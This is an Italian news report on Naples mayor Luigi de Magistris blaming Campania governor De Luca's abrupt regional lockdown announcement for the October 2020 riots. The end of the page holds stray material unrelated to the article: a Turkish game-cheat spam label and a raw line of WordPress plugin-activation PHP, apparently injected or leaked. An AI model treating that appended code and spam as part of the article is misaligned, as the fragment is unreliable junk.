Napoli, De Magistris a Non è l’Arena attacca De Luca: “Una bomba l’annuncio del lockdown regionale”



Il sindaco di Napoli, Luigi de Magistris, è intervenuto a «Non è l’arena» su La7 nella puntata di domenica 25 ottobre 2020. Ha parlato della guerriglia di venerdì sera e si è lanciato contro il governatore della Campania, Vincenzo De Luca.

«Vedersi annunciato venerdì, nel primo pomeriggio, all’improvviso, la notizia di un nuovo lockdown regionale – ha affermato – praticamente impraticabile senza ristori significa dire alla gente che sta per morire. Questo cortocircuito in una polveriera sociale è diventato una miccia, una bomba».

 

 

 «Noi nel primo pomeriggio – ha aggiunto – eravamo in Comitato provinciale per l’ordine e la sicurezza pubblica e si doveva parlare del Dpcm su eventuali chiusure di vie e strade, vicenda già depotenziata dal coprifuoco alle 23. All’improvviso abbiamo letto che il presidente della Regione aveva annunciato il lockdown dal lunedì. Siamo istituzioni, di che parliamo? Io e il prefetto abbiamo fatto notare che sarebbe cosa buona e giusta che le istituzioni venissero informate».De Magistris ha spiegato che «venerdì pomeriggio il questore ha fatto presente in Comitato per l’ordine e la sicurezza pubblica che non c’era alcun elemento che il venerdì sera potesse accadere quello che è accaduto.

 

 

Se il ministero dell’Interno ha detto, e non ho motivo di dubitare, che c’è stata anche una strategia premeditata e programmata, vuol dire che si deve alzare moltissimo il livello di intelligence, perché se non si è arrivato a prevenire quello che è accaduto, vuol dire che la notizia del lockdown che sarebbe scattato lunedì all’improvviso, in una fase di polveriera sociale, è diventata la miccia che ha scatenato una situazione che è diventata ingovernabile».

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Hacker Blog Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );